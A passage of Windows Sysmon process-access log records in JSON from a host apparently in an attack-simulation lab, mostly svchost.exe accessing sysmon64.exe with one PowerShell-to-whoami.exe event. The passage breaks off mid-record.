{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.375\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nSourceProcessId: 4444\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010B29E0400}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98b32ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a85096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f94817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97ff2ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fc8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd4287(wow64)|C:\\Windows\\